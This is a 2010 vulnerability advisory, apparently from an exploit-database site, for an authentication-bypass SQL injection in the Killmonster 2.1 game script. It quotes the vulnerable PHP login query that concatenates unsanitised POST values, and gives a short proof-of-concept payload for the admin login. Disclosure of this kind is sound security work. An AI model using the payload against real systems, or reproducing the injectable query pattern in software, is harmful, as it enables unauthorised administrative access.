Killmonster 2.1 remote SQL injection vulnerability

2010-02-09 / 2010-02-10

Credit: null

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

[+] Killmonster <= 2.1 (Auth Bypass) SQL Injection Vulnerability
[+] Discovered by cr4wl3r <cr4wl3r[!]linuxmail.org>
[+] Download : http://scripts.ringsworld.com/games-and-entertainment/km2/


[+] Vuln Code : 

[login.php]

<form method="POST" action="authenticate.php">
Type Username Here: <input type="text" name="isadmin" size="15"><br>
Type Password Here: <input type="password" name="password" size="15" mask="x"><br>
<input type="submit" value="submit" name="submit">

[authenticate.php]

    $isadmin=$_POST['isadmin'];
    $password=$_POST['password'];
    $password=md5($password);
    $query = "select * from km_admins where username='$isadmin' and password='$password'"; 
    $result = mysql_query($query) ;




[+] PoC : [Killmonster_path]/admin/login.php

username :  ' or' 1=1
password :  ' or' 1=1

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Killmonster 2.1 remote SQL injection vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.